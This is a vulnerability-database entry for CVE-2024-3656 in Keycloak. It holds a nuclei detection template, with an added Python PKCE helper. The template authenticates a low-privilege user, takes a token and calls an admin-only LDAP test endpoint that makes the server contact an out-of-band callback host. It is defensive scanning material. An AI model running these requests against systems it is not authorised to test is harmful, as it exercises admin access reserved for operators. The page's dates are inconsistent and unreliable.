Keycloak < 24.0.5 - Broken Access Control

04 Jul 2026 03:00:48 · Reported by ProjectDiscovery · Type: nuclei · Source: github.com

Keycloak < 24.0.5 - Broken Access Control: allows low-privilege users to access admin functionalities, potentially leading to data breaches or system compromise.

Code
id: CVE-2024-3656

info:
  name: Keycloak < 24.0.5 - Broken Access Control
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    A flaw was found in Keycloak. Certain endpoints in Keycloak's admin REST API allow low-privilege users to access administrative functionalities. This flaw allows users to perform actions reserved for administrators, potentially leading to data breaches or system compromise.
  impact: |
    Authenticated low-privilege users can access administrative functionalities, potentially leading to data breaches or system compromise.
  remediation: |
    Update Keycloak to version 24.0.5 or later.
  reference:
    - https://cn-sec.com/archives/3262467.html
    - https://github.com/advisories/GHSA-2cww-fgmg-4jqc
    - https://access.redhat.com/errata/RHSA-2024:3575
    - https://access.redhat.com/security/cve/CVE-2024-3656
    - https://bugzilla.redhat.com/show_bug.cgi?id=2274403
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 8.1
    cve-id: CVE-2024-3656
    cwe-id: CWE-200
    epss-score: 0.02837
    epss-percentile: 0.84928
  metadata:
    verified: true
    max-request: 5
    vendor: redhat
    product: keycloak
    shodan-query:
      - http.favicon.hash:"-1105083093"
      - http.html:"keycloak"
      - http.title:"keycloak"
    fofa-query:
      - icon_hash=-1105083093
      - body="keycloak"
      - title="keycloak"
    google-query: intitle:"keycloak"
  tags: cve,cve2024,keycloak,auth-bypass,authenticated,vuln

variables:
  username: "{{username}}"
  password: "{{password}}"
  realm: "master"
  code_verifier: "7BhCLfrzYxLzq3XzrfiA8TplZBDciJ0RZepiiDujJKwOaMDzMZWcqGvrCfYH6s735tzxteIUH1vWLP1D2xXm88O9XFEnxcx2"
  code_challenge: "{{ trim_right(replace(replace(base64(hex_decode(sha256(code_verifier))),'/','_'),'+','-'),'=') }}"
# we can also hardcode code_challenge to wMYxCiAZ5DmiZvqD0h5G_9QwE7IDDFRojvORiaqiTto

http:
  - raw:
      - |
        GET /realms/{{realm}}/protocol/openid-connect/auth?client_id=security-admin-console&redirect_uri={{Scheme}}%3A%2F%2f{{Hostname}}%2Fadmin%2F{{realm}}%2Fconsole%2F&state=1&response_mode=query&response_type=code&scope=openid&nonce=1&code_challenge_method=S256&code_challenge={{code_challenge}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: tabid
        part: body
        internal: true
        regex:
          - "&tab_id=(\\w+)&"
        group: 1

  - raw:
      - |
        GET /realms/{{realm}}/login-actions/authenticate?client_id=security-admin-console&tab_id={{tabid}}&client_data=eyJydCI6ImNvZGUiLCJybSI6InF1ZXJ5Iiwic3QiOiIxIn0= HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: auth_url
        part: body
        internal: true
        regex:
          - '"login.disabled = true; return true;" action="(.*?)"'
        group: 1

  - raw:
      - |
        POST {{replace(auth_url,'&amp;','&')}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}&credentialId=&

    extractors:
      - type: dsl
        name: codevalue
        internal: true
        dsl:
          - replace_regex(http_3_location,".*&code=","")
  - raw:
      - |
        POST /realms/{{realm}}/protocol/openid-connect/token HTTP/1.1
        Host: {{Hostname}}
        Content-type: application/x-www-form-urlencoded

        code={{codevalue}}&grant_type=authorization_code&client_id=security-admin-console&redirect_uri={{Scheme}}%3A%2F%2F{{Hostname}}%2Fadmin%2F{{realm}}%2Fconsole%2F&code_verifier={{code_verifier}}&

    extractors:
      - type: json
        part: body
        name: access_token
        json:
          - '.access_token'
        internal: true

  - raw:
      - |
        POST /admin/realms/{{realm}}/testLDAPConnection HTTP/1.1
        Host: {{Hostname}}
        authorization: Bearer {{access_token}}
        content-type: application/json

        {
            "action": "testConnection",
            "connectionUrl": "ldap://{{interactsh-url}}/",
            "bindDn": "cn=admin,dc=example,dc=com",
            "bindCredential": "password",
            "useTruststoreSpi": "ldapsOnly",
            "connectionTimeout": "5000"
        }

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'

      - type: word
        part: body
        words:
          - 'HTTP 403 Forbidden'
        negative: true
# digest: 4b0a00483046022100c1323fb8063c5d1953f87ecb32549ed575fee3eccbf29eab7f4081dc7b2f7b59022100b71d266a9028ff82ae99cc55f527d19963013ff60d344ee51937decb32001a3d:922c64590222798bb761d5b6d8e72950
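The template's code_challenge variable derives a PKCE S256 challenge from the fixed code_verifier with a chain of nuclei DSL functions, and the comment gives the precomputed result. The following Python is an added example (not part of the nuclei template) that reproduces that standard RFC 7636 derivation step by step, validates the verifier format, and checks the logic against the RFC 7636 Appendix B test vector; the verifier and challenge strings are copied from the template on this page.

```python
import base64
import hashlib
import re
import secrets

# Values taken from the nuclei template on this page (variables block and the
# comment that gives the precomputed challenge).
TEMPLATE_CODE_VERIFIER = "7BhCLfrzYxLzq3XzrfiA8TplZBDciJ0RZepiiDujJKwOaMDzMZWcqGvrCfYH6s735tzxteIUH1vWLP1D2xXm88O9XFEnxcx2"
TEMPLATE_CODE_CHALLENGE = "wMYxCiAZ5DmiZvqD0h5G_9QwE7IDDFRojvORiaqiTto"

# RFC 7636 Appendix B test vector (verifier -> S256 challenge).
RFC7636_VERIFIER = "dBjftJeZ4CVP-mB92K27uhbUJU1p1r_wW1gFWFOEjXk"
RFC7636_CHALLENGE = "E9Melhoa2OwvFrEMTJguCHaoeK1t8URWbuGJSstw-cM"

# RFC 7636 section 4.1: 43..128 unreserved characters.
_VERIFIER_RE = re.compile(r"^[A-Za-z0-9\-._~]{43,128}$")


def s256_challenge(code_verifier: str) -> str:
    """S256 exactly as the template's DSL chain does it:
    base64(hex_decode(sha256(v))), then '/'->'_', '+'->'-', trailing '=' removed
    (i.e. unpadded base64url of the raw SHA-256 digest)."""
    digest_hex = hashlib.sha256(code_verifier.encode("ascii")).hexdigest()  # sha256(...)
    raw = bytes.fromhex(digest_hex)                                          # hex_decode(...)
    b64 = base64.b64encode(raw).decode("ascii")                              # base64(...)
    return b64.replace("/", "_").replace("+", "-").rstrip("=")               # replace/trim_right


def is_valid_verifier(code_verifier: str) -> bool:
    """True when the verifier satisfies the RFC 7636 length and charset rules."""
    return _VERIFIER_RE.match(code_verifier) is not None


def new_verifier(nbytes: int = 32) -> str:
    """A fresh random verifier, as a real OAuth client should generate per request."""
    return base64.urlsafe_b64encode(secrets.token_bytes(nbytes)).decode("ascii").rstrip("=")


def template_challenge_matches() -> bool:
    """Compare the derived challenge with the value hardcoded in the template comment."""
    return s256_challenge(TEMPLATE_CODE_VERIFIER) == TEMPLATE_CODE_CHALLENGE


if __name__ == "__main__":
    print("RFC 7636 vector ok:", s256_challenge(RFC7636_VERIFIER) == RFC7636_CHALLENGE)
    print("template verifier valid:", is_valid_verifier(TEMPLATE_CODE_VERIFIER))
    print("template challenge matches comment:", template_challenge_matches())
```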


Scores (as of 04 Feb 2026 07:00): Vulners AI Score 7.1 (High risk) · CVSS 3.1 8.1 · EPSS 0.02837